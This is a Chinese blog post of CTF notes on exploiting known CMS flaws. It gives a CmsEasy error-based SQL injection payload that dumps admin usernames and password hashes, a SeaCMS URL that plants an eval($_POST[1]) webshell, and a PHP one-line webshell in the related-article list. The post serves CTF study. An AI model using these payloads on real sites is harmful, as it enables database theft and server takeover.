CTF--CMS漏洞总结

最新推荐文章于 2024-05-07 12:48:55 发布
最新推荐文章于 2024-05-07 12:48:55 发布
阅读量1.2w 收藏 35
点赞数 3
分类专栏: CTF Web 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/woshisz0413/article/details/84560314
版权
CTF 同时被 2 个专栏收录
10 篇文章 1 订阅
订阅专栏
Web
10 篇文章 0 订阅
订阅专栏

CMS漏洞总结

CMS类型题目:
首先判断CMS类型,再查询该CMS曾经出现的漏洞,利用漏洞获取用户名(admin)、密码后进入管理员界面查找注入;
或者上传一句话木马后使用菜刀连接,可能再连接数据库。

(1)CMSEASY类型
可用公开漏洞网站:https://www.seebug.org/appdir/CmsEasy
1.cmseasy 无限制报错注入
步骤:向http://*****/celive/live/header.php中添加POST参数,如下:
xajax=Postdata&xajaxargs[0]=detail=xxxxxx’,(UpdateXML(1,CONCAT(0x5b,substring((SELECT//GROUP_CONCAT(username,password) from yesercms_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)--
结果:可以爆出用户名及密码(md5加密)
例:XPATH syntax error: ‘[adminff512d4240cbbdeafada404677’
改进:XPATH显示的位数可能不够,所以改进POST参数,如下:
xajax=Postdata&xajaxargs[0]=detail=xxxxxx’,(UpdateXML(1,CONCAT(0x5b,substring((SELECT//GROUP_CONCAT(username,password)+from+yesercms_user),7,39),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)–+
解释:可见之前是1-32位,现在是7-39位,用户名是admin,该错误还会有一位’['占位,则密码的md5应该是6-39
第一次:XPATH syntax error: ‘[adminff512d4240cbbdeafada404677’
第二次:XPATH syntax error: ‘[f512d4240cbbdeafada404677ccbe61’
所以密码md5为:ff512d4240cbbdeafada404677ccbe61

(2)齐博CMS类型
可用公开漏洞网站:https://www.2cto.com/article/201501/365742.html

(3)海洋CMS
url变为:http://******/search.php?searchtype=5&tid=&area=eval($_POST[1])
就可使用菜刀进行连接,密码为1;
找到数据库文件后,在使用菜刀连接数据库

白菜大包子
关注
  • 3
    点赞
  • 35
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web-CMS漏洞
凌云鹤YK
02-21 8349
Web-CMS漏洞Web-CMS漏洞漏洞一:ThinkPHP <5.0.24 Request.php 远程代码执行漏洞漏洞二:ThinkPHP 5 <=5.0.22 远程代码执行高危漏洞漏洞三:微擎最新版SQL注入漏洞四:微擎1.5.4任意用户删除漏洞 Web-CMS漏洞 漏洞一:ThinkPHP <5.0.24 Request.php 远程代码执行漏洞 Url:https:/...
CTF学习(二)
qq_52696970的博客
08-21 730
CTF学习(二)Web站点信息收集1.CMS指纹识别2.针对CMS漏洞查询3.敏感目录信息4、wordpress测试端口信息收集1.端口介绍2.端口信息收集3.端口攻击4.防御措施 Web站点信息收集 1.CMS指纹识别 CMS(内容管理系统):整站系统或文章系统。用于网站内容管理。用户只需要下载对应的CMS软件包,部署搭建,就可以直接利用CMS,简单方便。但是各种CMS都具有其独特的结构命名规则和特定的文件内容,因此可以利用这些内容来获取CMS站点的具体软件CMS与版本。 常见CMS: dedecms(织
2024年网络安全最新Web安全 EmpireCMS漏洞常见漏洞分析及复现(1),2024年最新字节跳动面试官
最新发布
2401_84301948的博客
05-07 713
我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用,当secure_file_priv = 为空,则可以写入sql语句到数据库,当secure_file_priv = NULL,则不可以往数据库里写sql语句,当secure_file_priv = /xxx,一个指定目录的时候,就只能往这个指定的目录里面写东西。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
23、Web攻防——Python考点&CTFCMS-SSTI模板注入&PYC反编译
qq_55202378的博客
12-20 426
模板引擎:模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。如果报错页面的url或者post数据中,有一个参数你是可以控制,且会显示在报错页面中,那么就有可能存在SSTI模板注入。文件,一般python文件改变后,都会重新生成pyc文件。
CTF大赛】2021 DASCTF July cybercms 一探再探
A_991128a的博客
01-05 453
预期解是从后台登录处进行 SQL 注入写入一句话木马,然而咱在做题的时候尝试了另一种思路,用的是后台登录绕过 & 木马上传的打法。由于比赛的时候半天打不通就十分难受,赛后还是想不明白就来稍微深入探究了一下,经过曲折最后终于成功打通了。然而还是没打通,报错和上面的类似,也是 PHP 执行的时候文件目录没权限,只不过可以注意到文件名是。害,赛后看了看大佬的 wp,么得办法,还是得走 SQL 注入写入文件呗。都是可控的,任意改一个就完事了。过滤去掉了,另外把一些关键词过滤为空了,双写绕过就完事了。
CMS漏洞(发货100CMS、SHECMS、ZHCMS、MACCMS)详解实战
xinyue9966的博客
02-18 7439
CMS漏洞发货100CMS(弱口令)介绍系统版本靶场搭建漏洞复现修复方案SHECMS(SQL注入)介绍系统版本靶场搭建漏洞复现修复方案ZHCMS(文件上传)介绍系统版本靶场搭建漏洞复现修复方案MACCMS(CNVD-2019-43865)介绍系统版本靶场搭建漏洞复现修复方案 发货100CMS(弱口令) 介绍 弱口令漏洞 由于网站用户帐号存在弱口令,导致攻击者通过弱口令可轻松登录到网站中,从而进行下一步的攻击,如上传webshell,获取敏感数据。另外攻击者利用弱口令登录网站管理后台,可执行任意管理员的操作
web 会话超时,请求(http请求和ajax异步请求)处理
热门推荐
spring123666的专栏
12-11 2万+
最近在做的项目中前端使用的ext,今天把session超时跳转到登录页面的问题给解决了。 ext jquery 用户访问超时(ext session过期)  解决两种情况下的用户访问超时。  a)普通http请求的session超时。  b)异步http请求的session超时,使用ext后大部分的界面刷新都是异步的ajax请求。 不管是那种类型的http请求总是可以由一个过滤器来捕
Catfish(鲶鱼)cms-带有越权漏洞的源码.zip
03-16
越权漏洞是网络安全领域中常见的问题,尤其在内容管理系统(CMS)如Catfish(鲶鱼)中更为突出。这类漏洞允许未经授权的用户访问、修改或控制原本只应由特定权限用户操作的数据或功能。在本案例中,“Catfish(鲶鱼...
Hacker101-CTF
04-19
漏洞的启发,该课程使用户可以练习自己的举报(CTF)技能。 尝试通过识别和使用安全漏洞来获得标志,这些安全漏洞的可发现性会根据难度级别而变化。 在研究中,提到了与HackerOne CTF相关的一些主题的解决方案。...
ctf-challenge:平时收集的ctf译文
02-14
7. **PHP框架与CMS漏洞**:许多网站基于PHP框架(如Laravel、Symfony)或内容管理系统(如WordPress、Drupal)构建。了解这些框架和系统的常见漏洞,如SQL注入、XSS攻击等,可以帮助参赛者快速解决问题。 8. **Web...
漏洞网站源码.zip
08-27
在网络安全领域,尤其是CTF(Capture The Flag)竞赛中,了解和分析网站源码是寻找漏洞、提升防护能力的关键环节。本文将以“漏洞网站源码.zip”为研究对象,探讨其中包含的hh.tar.gz、Flaskshop.tar.gz和BlueCMS v...
毕业设计论坛源码jsp-WriteUp2017:某局CTF
06-06
因为是个老的cms,毕竟漏洞很多了,上网搜索一下发现两处漏洞。 一处是和题目切合的Cookie欺骗, 另外一处是个SQL注入。懒得对着屏幕一个个敲Cookie信息(内外网物理隔离),直接走注入。 注入地址是...
CMS漏洞复现
qq_44832048的博客
07-19 9785
dedeCMS (CNVD-2018-01221) 类型: php类cms系统:dedecms、帝国cms、php168、phpcmscmstop、discuz、phpwind等asp类cms系统:zblog、KingCMS等国外的著名cms系统:joomla、WordPress 、magento、drupal 、mambo。 dedeCMS (CNVD-2018-01221) 漏洞简介...
CMS常规漏洞审计
weixin_43263451的博客
04-01 3124
这个文章主要是记录一些我在审计过程中一些比较常规比较简单的漏洞,后续会一直更新 Discuz Discuz! X 3.4 admincp_misc.php SQL注入漏洞 这个漏洞就是没有对输入进行过滤导致的,没啥好说的 source\admincp\admincp_misc.php 721行 复现 Discuz ML! V3.X 代码注入漏洞 复现 参考链接: https://www.anquanke.com/post/id/181887 Joomla SESSION反序列化导致的rce 大概就是
极致CMS 1.7 审计与渗透测试
feng的博客
04-04 1788
前言 几天前在先知上看到了Firebasky师傅在先知上发的关于极致CMS的渗透测试。这个CMS的洞虽然已经公布了很久,但是因为自己还是太菜,基本上没有怎么接触过多少CMS,因此就从网上把极致CMS下载了下来,在本地搭建了一下环境来测试。 github上的极致CMS 这里我下载的是1.7版本,考虑到1.9版本可能大多数的洞都修了,就不好玩了,先把1.7试一遍,再搭一下1.9版本的看看。这篇文章相对来说会很乱,因为行文的思路是我随手乱试思路了。 后台上传文件 本地搭建一下,设置一下管理员账号和密码,直接自己登
ctf线下赛mysql密码_某CTF线下赛某CMS SQL注入分析
weixin_36046580的博客
01-21 294
前段时间,参加一次CTF线下攻防赛,用的是某cms,里面有一个SQL注入漏洞,挺有意思,记录一下分析心得。系统后台登陆处存在SQL注入,在后台登陆用户名处加个’测试一下:发现报错,十有八九存在SQL注入看下/admin/login.php内容:在42和43行发现对user和password进过fl_value()和fl_html()处理,然后送入check_login(),跟进check_logi...
[百度杯]九月场 再见CMS writeup
Flyour的博客
04-05 1901
再见CMS 拿到链接是一个博客网站,对于这样的题目: 1. 第一步,肯定是要判断出cms类型 2. 第二步,查询该cms曾经出现的漏洞 3. 第三步,然后利用这些漏洞拿到flag. 第一步:判断cms类型 这是该网站的登录页面,根据这个登录页面和下方的备案号、版权声明的格式都可以判断出这是个齐博cms。 下面是齐博CMS的整站系统:http://v7.qibosof...
day23 Python考点&CTFCMS-SSTI模版注入&PYC反编译
wanjia01的博客
10-15 543
小迪学习笔记,小迪yyds
[代码审计]极致CMS1.9.5存在文件上传漏洞
Y4tacker的博客
05-11 2943
文章目录极致CMSv1.9.5存在文件上传漏洞前言分析 极致CMSv1.9.5存在文件上传漏洞 前言 网上看到CNVD爆了,自己闲的没事做也稍微找一下,蛮简单的也挺常见的 分析 准备工作 首先本地创建一个php文件,这里我用1.php,内容为<?php eval($_POST[1]);?>之后把这 个文件压缩为zip后缀压缩包,上传至公网服务器即可,压缩包结构如下所示 漏洞利用点在后台插件安装处,我们任意点击一个插件点击安装抓包 发现url参数可控 在A/c/PluginsControll
ctf dirsearch
08-27
CTF dirsearch是一种用于CTF竞赛的扫描工具,它可以帮助参赛者在CTF比赛中发现隐藏在目标网站中的敏感文件和目录。具体使用方法如下: 1. 首先,下载并解压dirsearch工具包。 2. 打开命令行窗口,并进入dirsearch工具的目录路径。 3. 在命令行窗口中输入指令进行扫描,例如:python3 dirsearch.py -u http://target.com -e php,html。 4. 运行指令后,dirsearch会自动对指定的目标网站进行扫描,并输出可能存在的敏感文件和目录。 通过使用CTF dirsearch这个工具,参赛者可以更加高效地发现目标网站中的潜在漏洞和薄弱环节,从而提升自己在CTF竞赛中的竞争力。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [CTF零基础--手把手带你如何下载调用dirsearch工具](https://blog.csdn.net/gzuqhwang/article/details/125242866)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [【CTF工具】网址扫描器dirsearch下载安装与使用(linux下)](https://blog.csdn.net/Mitchell_Donovan/article/details/116141033)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值